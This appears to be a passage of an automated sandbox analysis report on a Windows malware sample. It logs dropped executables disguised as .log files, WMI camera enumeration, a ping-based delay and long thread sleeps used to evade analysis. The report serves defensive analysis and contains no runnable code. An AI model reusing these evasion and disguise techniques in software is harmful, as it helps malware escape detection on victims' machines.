                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                Source: C:\mshypercomponentSavesdll\agentFont.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\mshypercomponentSavesdll\agentFont.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMemory allocated: 1600000 memory reserve | memory write watch
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMemory allocated: 1B3A0000 memory reserve | memory write watch
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMemory allocated: 27B0000 memory reserve | memory write watch
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMemory allocated: 1A970000 memory reserve | memory write watch
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMemory allocated: 6F0000 memory reserve | memory write watch
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMemory allocated: 1A610000 memory reserve | memory write watch
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeMemory allocated: 1590000 memory reserve | memory write watch
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeMemory allocated: 1AF80000 memory reserve | memory write watch
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeMemory allocated: 2690000 memory reserve | memory write watch
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeMemory allocated: 1A8D0000 memory reserve | memory write watch
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMemory allocated: 1880000 memory reserve | memory write watch
                                Source: C:\mshypercomponentSavesdll\agentFont.exeMemory allocated: 1B340000 memory reserve | memory write watch
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exeThread delayed: delay time: 922337203685477
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 600000
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599818
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599656
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599546
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599437
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599328
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599218
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 599109
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 598998
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 598890
                                Source: C:\mshypercomponentSavesdll\agentFont.exeThread delayed: delay time: 3600000
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 598781
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 598668
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 598297
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 597891
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 597750
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 597639
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 597469
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 597337
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 597203
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 597086
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 596983
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 596874
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 596762
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 596656
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 596547
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 596437
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 596266
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 596154
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 596031
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 595900
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 595796
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 595305
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 595078
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 594953
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 594844
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 594734
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 594625
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 594515
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 594403
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 594285
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 594156
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 594031
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 593922
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 593811
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 593703
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 593594
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 593484
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 593375
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 593203
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 593078
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 592962
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 592625
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 592277
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 592150
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 592031
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 591922
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Thread delayed: delay time: 591812
                                Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3542
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1911
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3270
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2893
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2609
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2103
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Window / User API: threadDelayed 9663
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Dropped PE file which has not been started: C:\Users\user\Desktop\kZFyeAfm.log
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\mf04Loader.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Dropped PE file which has not been started: C:\Users\user\Desktop\cvxIvGPF.log
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HOfmkikL.log
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HhjUFBqv.log
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rEqPmwUs.log
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Dropped PE file which has not been started: C:\Users\user\Desktop\AnJfWYZZ.log
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 2196 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7692 Thread sleep count: 3542 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8104 Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956 Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792 Thread sleep count: 1911 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732 Thread sleep count: 3270 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072 Thread sleep time: -2767011611056431s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948 Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760 Thread sleep count: 2893 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740 Thread sleep count: 2609 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080 Thread sleep time: -2767011611056431s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872 Thread sleep count: 2103 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 5316 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 7768 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe TID: 6008 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe TID: 4476 Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 2304 Thread sleep time: -30000s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -33204139332677172s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -600000s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -599818s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -599656s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -599546s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -599437s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -599328s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -599218s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -599109s >= -30000s
                                Source: C:\mshypercomponentSavesdll\agentFont.exe TID: 4048 Thread sleep time: -598998s >= -30000s
